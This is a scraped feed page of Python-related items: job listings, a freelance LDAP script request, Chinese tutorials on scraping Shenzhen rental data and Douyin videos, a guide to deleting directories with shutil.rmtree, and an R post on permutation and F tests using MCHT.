Next Page: 10000

          Mid SOC Analyst - XOR Security - Fairmont, WV      Cache   Translate Page      
(e.g., Splunk dashboards, Splunk ES alerts, SNORT signatures, Python scripts, Powershell scripts.). XOR Security is currently seeking talented Cyber Threat...
From XOR Security - Sat, 14 Jul 2018 02:06:16 GMT - View all Fairmont, WV jobs
          CIO - Senior Java Developer - Experis - Lowell, MA      Cache   Translate Page      
Hands-on experience with programming languages such as Java / Python etc. Familiarity with Microservices, AWS Web Services, Apigee and a range of open source...
From Experis - Thu, 01 Nov 2018 23:43:10 GMT - View all Lowell, MA jobs
          script to update ldap      Cache   Translate Page      
I have an olive oil society The script (ideally in powershell or python) can import a .ldif file in ldap (Apache Directory Studio 2.0) It should be at the output of the script a log of success or error... (Budget: €250 - €750 EUR, Jobs: Linux, Powershell, Python, Shell Script, Windows Server)
          CIO - Senior Java Developer - Experis - Lowell, MA      Cache   Translate Page      
Hands-on experience with programming languages such as Java / Python etc. Familiarity with Microservices, AWS Web Services, Apigee and a range of open source...
From Experis - Thu, 01 Nov 2018 23:43:10 GMT - View all Lowell, MA jobs
          用Python告诉你深圳房租有多高      Cache   Translate Page      
概述 前言 统计结果 爬虫技术分析 爬虫代码实现 爬虫分析实现 后记 前言

最近各大一二线城市的房租都有上涨,究竟整体上涨到什么程度呢?我们也不得而知,于是乎 zone 为了一探究竟,便用 python 爬取了房某下的深圳的租房数据,以下是本次的样本数据:


用Python告诉你深圳房租有多高
样本数据

除去【不限】的数据(因为可能会与后面重叠),总数据量为 16971 ,其中后半部分地区数据量偏少,是由于该区房源确实不足。因此,此次调查也并非非常准确,权且当个娱乐项目,供大家观赏。

统计结果

我们且先看统计结果,然后再看技术分析。

深圳房源分布:(按区划分)

其中福田与南山的房源分布是最多的。但这两块地的房租可是不菲啊。


用Python告诉你深圳房租有多高
房源分布

房租单价:(每月每平方米单价 -- 平均数)

即是 1 平方米 1 个月的价格。方块越大,代表价格越高。


用Python告诉你深圳房租有多高
房租单价:平方米/月

可以看出福田与南山是独占鳌头,分别是 114.874 与 113.483 ,是其他地区的几倍。如果租个福田 20 平方的房间:

114.874 x 20 = 2297.48

再来个两百的水电、物业:

2297.48 + 200 = 2497.48

我们节俭一点来算的话,每天早餐 10 块,中午 25 块,晚饭 25 块:

2497.48 + 50 x 30 = 3997.48

是的,仅仅是活下来就需要 3997.48 块。

隔断时间下个馆子,每个月买些衣服,交通费,谈个女朋友,与女朋友出去逛街,妥妥滴加个 3500

3997.48 + 3500 = 7497.48 给爸妈一人一千: 7497.48 + 2000 = 9497.48

月薪一万妥妥滴,变成了月光族。

房租单价:(每日每平方米单价 -- 平均数)

即是 1 平方米 1 天的价格。
用Python告诉你深圳房租有多高
租房单价:平方米/日 以前在乡下没有寸土寸金的感觉,那么可以到北上广深体验一下,福田区每平方米每天需要 3.829 元。[捂脸] 户型

户型主要以 3 室 2 厅与 2 室 2 厅为主。与小伙伴抱团租房是最好的选择了,不然与不认识的人一起合租,可能会发生一系列让你不舒服的事情。字体越大,代表户型数量越多。


用Python告诉你深圳房租有多高
用Python告诉你深圳房租有多高
户型 租房面积统计

其中 30 - 90 平方米的租房占大多数,如今之计,也只能是几个小伙伴一起租房,抱团取暖了。


用Python告诉你深圳房租有多高
租房面积统计 租房描述词云

这是爬取的租房描述,其中字体越大,标识出现的次数越多。其中【精装修】占据了很大的部分,说明长租公寓也占领了很大一部分市场。


用Python告诉你深圳房租有多高
租房描述 爬虫思路

先爬取房某下深圳各个板块的数据,然后存进 MongoDB 数据库,最后再进行数据分析。


用Python告诉你深圳房租有多高
各个板块 数据库部分数据: /*1*/ { "_id":ObjectId("5b827d5e8a4c184e63fb1325"), "traffic":"距沙井电子城公交站约567米。",//交通描述 "address":"宝安-沙井-名豪丽城",//地址 "price":3100,//价格 "area":110,//面积 "direction":"朝南\r\n",//朝向 "title":"沙井名豪丽城精装三房家私齐拎包住高层朝南随时看房",//标题 "rooms":"3室2厅",//户型 "region":"宝安"//地区 } 爬虫技术分析 请求库:requests HTML 解析:BeautifulSoup 词云:wordcloud 数据可视化:pyecharts 数据库:MongoDB 数据库连接:pymongo 爬虫代码实现

首先右键网页,查看页面源码,找出我们要爬取得部分。


用Python告诉你深圳房租有多高
源码

代码实现,由于篇幅原因只展示主要代码:(获取一个页面的数据)

defgetOnePageData(self,pageUrl,reginon="不限"): rent=self.getCollection(self.region) self.session.headers.update({ 'User-Agent':'Mozilla/5.0(Macintosh;IntelMacOSX10_13_3)AppleWebKit/537.36(KHTML,likeGecko)Chrome/68.0.3440.84Safari/537.36'}) res=self.session.get( pageUrl ) soup=BeautifulSoup(res.text,"html.parser") divs=soup.find_all("dd",attrs={"class":"inforel"})#获取需要爬取得div fordivindivs: ps=div.find_all("p") try:#捕获异常,因为页面中有些数据没有被填写完整,或者被插入了一条广告,则会没有相应的标签,所以会报错 forindex,pinenumerate(ps):#从源码中可以看出,每一条p标签都有我们想要的信息,故在此遍历p标签, text=p.text.strip() print(text)#输出看看是否为我们想要的信息 print("===================================") #爬取并存进MongoDB数据库 roomMsg=ps[1].text.split("|") #rentMsg这样处理是因为有些信息未填写完整,导致对象报空 area=roomMsg[2].strip()[:len(roomMsg[2])-2] rentMsg=self.getRentMsg( ps[0].text.strip(), roomMsg[1].strip(), int(float(area)), int(ps[len(ps)-1].text.strip()[:len(ps[len(ps)-1].text.strip())-3]), ps[2].text.strip(), ps[3].text.strip(), ps[2].text.strip()[:2], roomMsg[3], ) rent.insert(rentMsg) except: continue 数据分析实现 数据分析: #求一个区的房租单价(平方米/元) defgetAvgPrice(self,region): areaPinYin=self.getPinyin(region=region) collection=self.zfdb[areaPinYin] totalPrice=collection.aggregate([{'$group':{'_id':'$region','total_price':{'$sum':'$price'}}}]) totalArea=collection.aggregate([{'$group':{'_id':'$region','total_area':{'$sum':'$area'}}}]) totalPrice2=list(totalPrice)[0]["total_price"] totalArea2=list(totalArea)[0]["total_area"] returntotalPrice2/totalArea2 #获取各个区每个月一平方米需要多少钱 defgetTotalAvgPrice(self): totalAvgPriceList=[] totalAvgPriceDirList=[] forindex,regioninenumerate(self.getAreaList()): avgPrice=self.getAvgPrice(region) totalAvgPriceList.append(round(avgPrice,3)) totalAvgPriceDirList.append({"value":round(avgPrice,3),"name":region+""+str(round(avgPrice,3))}) returntotalAvgPriceDirList #获取各个区每一天一平方米需要多少钱 defgetTotalAvgPricePerDay(self): totalAvgPriceList=[] forindex,regioninenumerate(self.getAreaList()): avgPrice=self.getAvgPrice(region) totalAvgPriceList.append(round(avgPrice/30,3)) return(self.getAreaList(),totalAvgPriceList) #获取各区统计样本数量 defgetAnalycisNum(self): analycisList=[] forindex,regioninenumerate(self.getAreaList()): collection=self.zfdb[self.pinyinDir[region]] print(region) totalNum=collection.aggregate([{'$group':{'_id':'','total_num':{'$sum':1}}}]) totalNum2=list(totalNum)[0]["total_num"] analycisList.append(totalNum2) return(self.getAreaList(),analycisList) #获取各个区的房源比重 defgetAreaWeight(self): result=self.zfdb.rent.aggregate([{'$group':{'_id':'$region','weight':{'$sum':1}}}]) areaName=[] areaWeight=[] foriteminresult: ifitem["_id"]inself.getAreaList(): areaWeight.append(item["weight"]) areaName.append(item["_id"]) print(item["_id"]) print(item["weight"]) #print(type(item)) return(areaName,areaWeight) #获取title数据,用于构建词云 defgetTitle(self): collection=self.zfdb["rent"] queryArgs={} projectionFields={'_id':False,'title':True}#用字典指定需要的字段 searchRes=collection.find(queryArgs,projection=projectionFields).limit(1000) content='' forresultinsearchRes: print(result["title"]) content+=result["title"] returncontent #获取户型数据(例如:3室2厅) defgetRooms(self): results=self.zfdb.rent.aggregate([{'$group':{'_id':'$rooms','weight':{'$sum':1}}}]) roomList=[] weightList=[] forresultinresults: roomList.append(result["_id"]) weightList.append(result["weight"]) #print(list(result)) return(roomList,weightList) #获取租房面积 defgetAcreage(self): results0_30=self.zfdb.rent.aggregate([ {'$match':{'area':{'$gt':0,'$lte':30}}}, {'$group':{'_id':'','count':{'$sum':1}}} ]) results30_60=self.zfdb.rent.aggregate([ {'$match':{'area':{'$gt':30,'$lte':60}}}, {'$group':{'_id':'','count':{'$sum':1}}} ]) results60_90=self.zfdb.rent.aggregate([ {'$match':{'area':{'$gt':60,'$lte':90}}}, {'$group':{'_id':'','count':{'$sum':1}}} ]) results90_120=self.zfdb.rent.aggregate([ {'$match':{'area':{'$gt':90,'$lte':120}}}, {'$group':{'_id':'','count':{'$sum':1}}} ]) results120_200=self.zfdb.rent.aggregate([ {'$match':{'area':{'$gt':120,'$lte':200}}}, {'$group':{'_id':'','count':{'$sum':1}}} ]) results200_300=self.zfdb.rent.aggregate([ {'$match':{'area':{'$gt':200,'$lte':300}}}, {'$group':{'_id':'','count':{'$sum':1}}} ]) results300_400=self.zfdb.rent.aggregate([ {'$match':{'area':{'$gt':300,'$lte':400}}}, {'$group':{'_id':'','count':{'$sum':
          Python : How to delete a directory recursively using shutil.rmtree()      Cache   Translate Page      

In this article we will discuss how to delete an empty directory and also all contents of directory recursively i.e including contents of its sub directories.

Delete an empty directory using os.rmdir()

python’s os module provide a function to delete an empty directory i.e.

os.rmdir(pathOfDir)

Path of directory can be relative or absolute. It will delete the empty folder at given path.

It can also raise errors in following scenarios,

If directory is not empty then it will cause OSError i.e. OSError: [WinError 145] The directory is not empty: If given directory path is not pointing to a directory, then this error will be raised, NotADirectoryError: [WinError 267] The directory name is invalid: If there is no directory at given path then this error will be raised, FileNotFoundError: [WinError 2] The system cannot find the file specified:

Let’s use this to delete an empty directory,

import os #Delete an empty directory using os.rmdir() and handle exceptions try: os.rmdir('/somedir/log9') except: print('Error while deleting directory') Delete all files in a directory & sub-directories recursively using shutil.rmtree()

Python’s shutil module provides a function to delete all the contents of a directory i.e.

shutil.rmtree(path, ignore_errors=False, onerror=None)

It accepts 3 arguments ignore_errors, onerror and path.

path argumentshould be a path of the directory to be deleted. We we will discuss other arguments very soon.

Module required,

import shutil

Let’s use this to delete all the contents of a directory i.e.

import shutil dirPath = '/somedir/logs/'; # Delete all contents of a directory using shutil.rmtree() andhandle exceptions try: shutil.rmtree(dirPath) except: print('Error while deleting directory')

It will delete all the contents of directory’/somedir/logs/’

But if any of the file in directory has read only attributes i.e. user can not delete that file, then it will raise an exception i.e.

PermissionError: [WinError 5] Access is denied:

Also it will not delete the remaining files. To handle this kind of scenario let’s use other argument ignore_errors.

shutil.rmtree() & ignore_errors

by passing ignore_errors=True in shultil.rmtree() we can ignore the errors encountered. It will go forward with deleting all the files and skip the files which raise exceptions while deleting.

Suppose we have a file in log directory that can not be deleted due to permission issues. So,

shutil.rmtree(dirPath, ignore_errors=True)

will remove all the other files from ‘/somedir/logs’ directory except the file with permission issues. Also, it will not raise any error.

But this might not be the case always, we might want to handle errors instead of ignoring them. For that we have other argument of shutil.rmtree() i.e. onerror.

Passing callbacks in shutil.rmtree() with onerror shutil.rmtree(path, ignore_errors=False, onerror=None)

In onerror parameter we can pass a callback function to handle errors i.e.

shutil.rmtree(dirPath, onerror=handleError )

callback function passed in onerror must be a callable like this,

def handleError(func, path, exc_info): pass

It should accepts three parameters:

function function which raised the exception path path name passed which raised the exception while removal excinfo exception information returned by sys.exc_info()

If any exception occurs while deleting a file in rmtree() and onerror callback is provided. Then callback will be called to handle the error. Afterwards shutil.rmtree() will continue deleting other files.

Now suppose we want to delete all the contents of directory ‘/somedir/logs’ . But we have a file in logs directory that can not be deleted due to permission issues. Let’s pass a callback to handle the error

import os import shutil ''' Error handler function It will try to change file permission and call the calling function again, ''' def handleError(func, path, exc_info): print('Handling Error for file ' , path) print(exc_info) # Check if file access issue if not os.access(path, os.W_OK): print('Hello') # Try to change the permision of file os.chmod(path, stat.S_IWUSR) # call the calling function again func(path) # Delete all contents of a directory and handle errors shutil.rmtree(dirPath, onerror=handleError )

Now while deleting all the files in given directory, as soon as rmtree() encounters a file that can not be deleted, it calls the callback passed in onerror parameter for that file.

In this callback we will check if it’s am access issue then we will change the file permission and then call called function func i.e. rmtree() with the path of file. t will eventually delete the file.Then rmtree() will continue deleting other files in the directory.

Complete example is as follows,

import os import shutil import stat ''' Error handler function It will try to change file permission and call the calling function again, ''' def handleError(func, path, exc_info): print('Handling Error for file ' , path) print(exc_info) # Check if file access issue if not os.access(path, os.W_OK): print('Hello') # Try to change the permision of file os.chmod(path, stat.S_IWUSR) # call the calling function again func(path) def main(): print("******** Delete an empty directory *********") #Delete an empty directory using os.rmdir() and handle exceptions try: os.rmdir('/somedir/log9') except: print('Error while deleting directory') print("******** Delete all contents of a directory *********") dirPath = '/somedir/logs/'; # Delete all contents of a directory using shutil.rmtree() andhandle exceptions try: shutil.rmtree(dirPath) except: print('Error while deleting directory') # Delete all contents of a directory and ignore errors shutil.rmtree(dirPath, ignore_errors=True) # Delete all contents of a directory and handle errors shutil.rmtree(dirPath, onerror=handleError ) if __name__ == '__main__': main() Click Here to Subscribe for more Articles / Tutorials like this.


          Python十行代码爬抖音      Cache   Translate Page      

今天看到一篇文章介绍怎么用python来爬抖音的小视频和音乐。于是兴趣大增,先来试试能不能玩,哈哈。

先来看个效果图,嗯嗯…

效果图
Python十行代码爬抖音
环境说明

环境:

python 3.7.1

centos 7.4

pip 10.0.1

部署 [root@localhost ~]# python3.7 --version Python 3.7.1 [root@localhost ~]# [root@localhost ~]# pip3 install douyin
Python十行代码爬抖音
有时候因为网络原因会安装失败,这时重新执行上面的命令即可,直到安装完成。

导入douyin模块

[root@localhost ~]# python3.7 >>>import douyin >>>

导入如果报错的话,可能douyin模块没有安装成功。

下面我们开始爬…爬抖音小视频和音乐咯

[root@localhost douyin]# python3.7 dou.py
Python十行代码爬抖音
Python十行代码爬抖音

几分钟后…我们来看看爬的成果

可以看到视频配的音乐被存储成了 mp3 格式的文件,抖音视频存储成了 mp4 文件。


Python十行代码爬抖音

嗯…不错,哈哈。

py脚本

作者说,能爬抖音上所有热门话题和音乐下的相关视频都爬取到,并且将爬到的视频下载下来,同时还要把视频所配的音乐也单独下载下来,不仅如此,所有视频的相关信息如发布人、点赞数、评论数、发布时间、发布人、发布地点等等信息都需要爬取下来,并存储到 MongoDB 数据库。

import douyin from douyin.structures import Topic, Music # 定义视频下载、音频下载、MongoDB 存储的处理器 video_file_handler = douyin.handlers.VideoFileHandler(folder='./videos') music_file_handler = douyin.handlers.MusicFileHandler(folder='./musics') #mongo_handler = douyin.handlers.MongoHandler() # 定义下载器,并将三个处理器当做参数传递 #downloader = douyin.downloaders.VideoDownloader([mongo_handler, video_file_handler, music_ file_handler]) downloader = douyin.downloaders.VideoDownloader([video_file_handler, music_file_handler]) # 循环爬取抖音热榜信息并下载存储 for result in douyin.hot.trend(): for item in result.data: # 爬取热门话题和热门音乐下面的所有视频,每个话题或音乐最多爬取 10 个相关视频。 downloader.download(item.videos(max=10))

由于我这里没有mongodb所以,把这mongodb相关的配置给注释掉了。

作者github地址: https://github.com/Python3WebSpider/DouYin

====以下摘自作者====

代码解读

本库依赖的其他库有:

aiohttp:利用它可以完成异步数据下载,加快下载速度 dateparser:利用它可以完成任意格式日期的转化 motor:利用它可以完成异步 MongoDB 存储,加快存储速度 requests:利用它可以完成最基本的 HTTP 请求模拟 tqdm:利用它可以进行进度条的展示

数据结构定义

如果要做一个库的话,一个很重要的点就是对一些关键的信息进行结构化的定义,使用面向对象的思维对某些对象进行封装,抖音的爬取也不例外。

在抖音中,其实有很多种对象,比如视频、音乐、话题、用户、评论等等,它们之间通过某种关系联系在一起,例如视频中使用了某个配乐,那么视频和音乐就存在使用关系;比如用户发布了视频,那么用户和视频就存在发布关系,我们可以使用面向对象的思维对每个对象进行封装,比如视频的话,就可以定义成如下结构:

class Video(Base): def __init__(self, **kwargs): """ init video object :param kwargs: """ super().__init__() self.id = kwargs.get('id') self.desc = kwargs.get('desc') self.author = kwargs.get('author') self.music = kwargs.get('music') self.like_count = kwargs.get('like_count') self.comment_count = kwargs.get('comment_count') self.share_count = kwargs.get('share_count') self.hot_count = kwargs.get('hot_count') ... self.address = kwargs.get('address') def __repr__(self): """ video to str :return: str """ return '<Video: <%s, %s>>' % (self.id, self.desc[:10].strip() if self.desc else None)

这里将一些关键的属性定义成 Video 类的一部分,包括 id 索引、desc 描述、author 发布人、music 配乐等等,其中 author 和 music 并不是简单的字符串的形式,它也是单独定义的数据结构,比如 author 就是 User 类型的对象,而 User 的定义又是如下结构:

class User(Base): def __init__(self, **kwargs): """ init user object :param kwargs: """ super().__init__() self.id = kwargs.get('id') self.gender = kwargs.get('gender') self.name = kwargs.get('name') self.create_time = kwargs.get('create_time') self.birthday = kwargs.get('birthday') ... def __repr__(self): """ user to str :return: """ return '<User: <%s, %s>>' % (self.alias, self.name)

所以说,通过属性之间的关联,我们就可以将不同的对象关联起来,这样显得逻辑架构清晰,而且我们也不用一个个单独维护字典来存储了,其实这就和 Scrapy 里面的 Item 的定义是类似的。

请求和重试

实现爬取的过程就不必多说了,这里面其实用到的就是最简单的抓包技巧,使用 Charles 直接进行抓包即可。抓包之后便可以观察到对应的接口请求,然后进行模拟即可。

所以问题就来了,难道我要一个接口写一个请求方法吗?另外还要配置 Headers、超时时间等等的内容,那岂不是太费劲了,所以,我们可以将请求的方法进行单独的封装,这里我定义了一个 fetch 方法:

def _fetch(url, **kwargs): """ fetch api response :param url: fetch url :param kwargs: other requests params :return: json of response """ response = requests.get(url, **kwargs) if response.status_code != 200: raise requests.ConnectionError('Expected status code 200, but got {}'.format(response.status_code)) return response.json()

这个方法留了一个必要参数,即 url,另外其他的配置我留成了 kwargs,也就是可以任意传递,传递之后,它会依次传递给 requests 的请求方法,然后这里还做了异常处理,如果成功请求,即可返回正常的请求结果。

定义了这个方法,在其他的调用方法里面我们只需要单独调用这个 fetch 方法即可,而不需要再去关心异常处理,返回类型了。

好,那么定义好了请求之后,如果出现了请求失败怎么办呢?按照常规的方法,我们可能就会在外面套一层方法,然后记录调用 fetch 方法请求失败的次数,然后重新调用 fetch 方法进行重试,但这里可以告诉大家一个更好用的库,叫做 retrying,使用它我们可以通过定义一个装饰器来完成重试的操作。

比如我可以使用 retry 装饰器这么装饰 fetch 方法:

from retrying import retry @retry(stop_max_attempt_number=retry_max_number, wait_random_min=retry_min_random_wait, wait_random_max=retry_max_random_wait, retry_on_exception=need_retry) def _fetch(url, **kwargs): pass

这里使用了装饰器的四个参数:

stop_max_attempt_number:最大重试次数,如果重试次数达到该次数则放弃重试 wait_random_min:下次重试之前随机等待时间的最小值 wait_random_max:下次重试之前随机等待时间的最大值 retry_on_exception:判断出现了怎样的异常才重试

这里 retry_on_exception 参数指定了一个方法,叫做 need_retry,方法定义如下:

def need_retry(exception): """ need to retry :param exception: :return: """ result = isinstance(exception, (requests.ConnectionError, requests.ReadTimeout)) if result: print('Exception', type(exception), 'occurred, retrying...') return result

这里判断了如果是 requests 的 ConnectionError 和 ReadTimeout 异常的话,就会抛出异常进行重试,否则不予重试。

所以,这样我们就实现了请求的封装和自动重试,是不是非常 Pythonic?

下载处理器的设计

为了下载视频,我们需要设计一个下载处理器来下载已经爬取到的视频链接,所以下载处理器的输入就是一批批的视频链接,下载器接收到这些链接,会将其进行下载处理,并将视频存储到对应的位置,另外也可以完成一些信息存储操作。

在设计时,下载处理器的要求有两个,一个是保证高速的下载,另一个就是可扩展性要强,下面我们分别来针对这两个特点进行设计:
高速下载,为了实现高速的下载,要么可以使用多线程或多进程,要么可以用异步下载,很明显,后者是更有优势的。 扩展性强,下载处理器要能下载音频、视频,另外还可以支持数据库等存储,所以为了解耦合,我们可以将视频下载、音频下载、数据库存储的功能独立出来,下载处理器只负责视频链接的主要逻辑处理和分配即可。

为了实现高速下载,这里我们可以使用 aiohttp 库来完成,另外异步下载我们也不能一下子下载太多,不然网络波动太大,所以我们可以设置 batch 式下载,可以避免同时大量的请求和网络拥塞,主要的下载函数如下:

def download(self, inputs): """ download video or video lists :param data: :return: """ if isinstance(inputs, types.GeneratorType): temps = [] for result in inputs: print('Processing', result, '...') temps.append(result) if len(temps) == self.batch: self.process_items(temps) temps = [] else: inputs = inputs if isinstance(inputs, list) else [inputs] self.process_items(inputs)

这个 download 方法设计了多种数据接收类型,可以接收一个生成器,也可以接收单个或列表形式的视频对象数据,接着调用了 process_items 方法进行了异步下载,其方法实现如下:

def process_items(self, objs): """ process items :param objs: objs :return: """ # define progress bar with tqdm(total=len(objs)) as self.bar: # init event loop loop = asyncio.get_event_loop() # get num of batches total_step = int(math.ceil(len(objs) / self.batch)) # for every batch for step in range(total_step): start, end = step * self.batch, (step + 1) * self.batch print('Processing %d-%d of files' % (start + 1, end)) # get batch of objs objs_batch = objs[start: end] # define tasks and run loop tasks = [asyncio.ensure_future(self.process_item(obj)) for obj in objs_batch] for task in tasks: task.add_done_callback(self.update_progress) loop.run_until_complete(asyncio.wait(tasks))

这里使用了 asyncio 实现了异步处理,并通过对视频链接进行分批处理保证了流量的稳定性,另外还使用了 tqdm 实现了进度条的显示。

我们可以看到,真正的处理下载的方法是 process_item,这里面会调用视频下载、音频下载、数据库存储的一些组件来完成处理,由于我们使用了 asyncio 进行了异步处理,所以 process_item 也需要是一个支持异步处理的方法,定义如下:

async def process_item(self, obj): """ process item :param obj: single obj :return: """ if isinstance(obj, Video): print('Processing', obj, '...') for handler in self.handlers: if isinstance(handler, Handler): await handler.process(obj)

这里我们可以看到,真正的处理逻辑都在一个个 handler 里面,我们将每个单独的功能进行了抽离,定义成了一个个 Handler,这样可以实现良好的解耦合,如果我们要增加和关闭某些功能,只需要配置不同的 Handler 即可,而不需要去改动代码,这也是设计模式的一个解耦思想,类似工厂模式。

Handler 的设计

刚才我们讲了,Handler 就负责一个个具体功能的实现,比如视频下载、音频下载、数据存储等等,所以我们可以将它们定义成不同的 Handler,而视频下载、音频下载又都是文件下载,所以又可以利用继承的思想设计一个文件下载的 Handler,定义如下:

from os.path import join, exists from os import makedirs from douyin.handlers import Handler from douyin.utils.type import mime_to_ext import aiohttp class FileHandler(Handler): def __init__(self, folder): """ init save folder :param folder: """ super().__init__() self.folder = folder if not exists(self.folder): makedirs(self.folder) async def _process(self, obj, **kwargs): """ download to file :param url: resource url :param name: save name :param kwargs: :return: """ print('Downloading', obj, '...') kwargs.update({'ssl': False}) kwargs.update({'timeout': 10}) async with aiohttp.ClientSession() as session: async with session.get(obj.play_url, **kwargs) as response: if response.status == 200: extension = mime_to_ext(response.headers.get('Content-Type')) full_path = join(self.folder, '%s.%s' % (obj.id, extension)) with open(full_path, 'wb') as f: f.write(await response.content.read()) print('Downloaded file to', full_path) else: print('Cannot download %s, response status %s' % (obj.id, response.status)) async def process(self, obj, **kwargs): """ process obj :param obj: :param kwargs: :return: """ return await self._process(obj, **kwargs)

这里我们还是使用了 aiohttp,因为在下载处理器中需要 Handler 支持异步操作,这里下载的时候就是直接请求了文件链接,然后判断了文件的类型,并完成了文件保存。

视频下载的 Handler 只需要继承当前的 FileHandler 即可:

from douyin.handlers import FileHandler from douyin.structures import Video class VideoFileHandler(FileHandler): async def process(self, obj, **kwargs): """ process video obj :param obj: :param kwargs: :return: """ if isinstance(obj, Video): return await self._process(obj, **kwargs)

这里其实就是加了类别判断,确保数据类型的一致性,当然音频下载也是一样的。

异步 MongoDB 存储

上面介绍了视频和音频处理的 Handler,另外还有一个存储的 Handler 没有介绍,那就是 MongoDB 存储,平常我们可能习惯使用 PyMongo 来完成存储,但这里我们为了加速,需要支持异步操作,所以这里有一个可以实现异步 MongoDB 存储的库,叫做 Motor,其实使用的方法差不太多,MongoDB 的连接对象不再是 PyMongo 的 MongoClient 了,而是 Motor 的 AsyncIOMotorClient,其他的配置基本类似。

在存储时使用的是 update_one 方法并开启了 upsert 参数,这样可以做到存在即更新,不存在即插入的功能,保证数据的不重复性。

整个 MongoDB 存储的 Handler 定义如下:

from douyin.handlers import Handler from motor.motor_asyncio import AsyncIOMotorClient from douyin.structures import * class MongoHandler(Handler): def __init__(self, conn_uri=None, db='douyin'): """ init save folder :param folder: """ super().__init__() if not conn_uri: conn_uri = 'localhost' self.client = AsyncIOMotorClient(conn_uri) self.db = self.client[db] async def process(self, obj, **kwargs): """ download to file :param url: resource url :param name: save name :param kwargs: :return: """ collection_name = 'default' if isinstance(obj, Video): collection_name = 'videos' elif isinstance(obj, Music): collection_name = 'musics' collection = self.db[collection_name] # save to mongodb print('Saving', obj, 'to mongodb...') if await collection.update_one({'id': obj.id}, {'$set': obj.json()}, upsert=True): print('Saved', obj, 'to mongodb successfully') else: print('Error occurred while saving', obj)

可以看到我们在类中定义了 AsyncIOMotorClient 对象,并暴露了 conn_uri 连接字符串和 db 数据库名称,可以在声明 MongoHandler 类的时候指定 MongoDB 的链接地址和数据库名。

同样的 process 方法,这里使用 await 修饰了 update_one 方法,完成了异步 MongoDB 存储。

好,以上便是 douyin 库的所有的关键部分介绍,这部分内容可以帮助大家理解这个库的核心部分实现,另外可能对设计模式、面向对象思维以及一些实用库的使用有一定的帮助。

参考: https://github.com/Python3WebSpider/DouYin

不到 10 行代码爬抖音

附件:

douyin.py

Python-3.7.1.tar.xz
          Beyond Univariate, Single-Sample Data with MCHT      Cache   Translate Page      

(This article was first published on R Curtis Miller's Personal Website , and kindly contributed toR-bloggers)

Introduction

I’ve spent the past few weeks writing about MCHT , my new package for Monte Carlo and bootstrap hypothesis testing. After discussing how to use MCHT safely , I discussed how to use it for maximized Monte Carlo (MMC) testing , then bootstrap testing . One may think I’ve said all I want to say about the package, but in truth, I’ve only barely passed the halfway point!

Today I’m demonstrating how general MCHT is, allowing one to use it for multiple samples and on non-univariate data. I’ll be doing so with two examples: a permutation test and the

test for significance of a regression model.

Permutation Test The idea of the permutation test dates back to Fisher (see [1]) and it forms the basis of computational testing for difference in mean. Let’s suppose that we have two samples with respective means and

, respectively. Suppose we wish to test

against


Beyond Univariate, Single-Sample Data with MCHT

using samples

and

, respectively.

If the null hypothesis is true and we also make the stronger assumption that the two samples were drawn from distributions that could differ only in their means, then the labelling of the two samples is artificial, and if it were removed the two samples would be indistinguishable. Relabelling the data and artificially calling one sample the

sample and the other the

sample would produce highly similar statistics to the one we actually observed. This observation suggests the following procedure:

Generate new datasets by randomly assigning labels to the combined sample of and . Compute copies of the test statistic on each of the new samples; suppose that the test statistic used is the difference in means, . Compute the test statistic on the actual sample and compare to the simulated statistics. If the actual statistic is relatively large compared to the simulated statistics, then reject the null hypothesis in favor of the alternative; otherwise, don’t reject.

In practice step 3 is done by computing a

-value representing the proportion of simulated statistics larger than the one actually computed.

Permutation Tests Using MCHT

The permutation test is effectively a bootstrap test, so it is supported by MCHT , though one may wonder how that’s the case when the parameters test_stat , stat_gen , and rand_gen only accept one parameter, x , representing the dataset (as opposed to, say, t.test() , which has an x and an optional y parameter). But MCHTest() makes very few assumptions about what object x actually is; if your object is either a vector or tabular, then the MCHTest object should not have a problem with it (it’s even possible a loosely structured list would be fine, but I have not tested this; tabular formats should cover most use cases).

In this case, putting our data in long-form format makes doing a permutation test fairly simple. One column will contain the group an observation belongs to while the other contains observation values. The test_stat function will split the data according to group, compute group-wise means, and finally compute the test statistic. rand_gen generates new dataset by permuting the labels in the data frame. stat_gen merely serves as the glue between the two.

The result is the following test.

library(MCHT) library(doParallel) registerDoParallel(detectCores()) ts <- function(x) { grp_means <- aggregate(value ~ group, data = x, FUN = mean) grp_means$value[1] - grp_means$value[2] } rg <- function(x) { x$group <- sample(x$group) x } sg <- function(x) { test_stat(x) } permute.test <- MCHTest(ts, sg, rg, seed = 123, N = 1000, localize_functions = TRUE) df <- data.frame("value" = c(rnorm(5, 2, 1), rnorm(10, 0, 1)), "group" = rep(c("x", "y"), times = c(5, 10))) permute.test(df) ## ## Monte Carlo Test ## ## data: df ## S = 1.3985, p-value = 0.036 Linear Regression F Test

Suppose for each observation in our dataset there is an outcome of interest,

, and there are variables that could together help predict the value of if they are known. Consider then the following linear regression model (with

):

The first question someone should asked when considering a regression model is whether it’s worth anything at all. An alternative approach to predicting

is simply to predict its mean value. That is, the model

is much simpler and should be preferred to the more complicated model listed above if it’s just as good at explaining the behavior of

for all . Notice the second model is simply the first model with all the coefficients

identically equal to zero.

The

-test (described in more detail here

) can help us decide between these two competing models. Under the null hypothesis, the second model is the true model.

The alternative says that at least one of the regressors is helpful in predicting

.

We can use the

statistic to decide between the two models:

and

are the residual sum of squares of models 1 and

2, respectively.

This test is called the

-test because usually the F-distribution is used to compute -values (as this is the distributiont the

statistic should follow when certain conditions hold, at least asymptotically if not exactly). What then would a bootstrap-based procedure look like?

If the null hypothesis is true then the best model for the data is this:

is the sample mean of and

is the residual. This suggests the following procedure:

Shuffle over all rows of the input dataset, with replacement, to generate new datasets. Compute statistics for each of the generated datasets. Compare the statistic of the actual dataset to the generated datasets’ statistics. F Test Using MCHT

Let’s perform the

test on a subset of the iris dataset. We will see if there is a relationship between the sepal length and sepal width among iris setosa

flowers. Below is an initial split and visualization:

library(dplyr) setosa <- iris %>% filter(Species == "setosa") %>% select(Sepal.Length, Sepal.Width) plot(Sepal.Width ~ Sepal.Length, data = setosa)
Beyond Univariate, Single-Sample Data with MCHT

There is an obvious relationship between the variables. Thus we should expect the test to reject the null hypothesis. That is what we would conclude if we were to run the conventional

test:

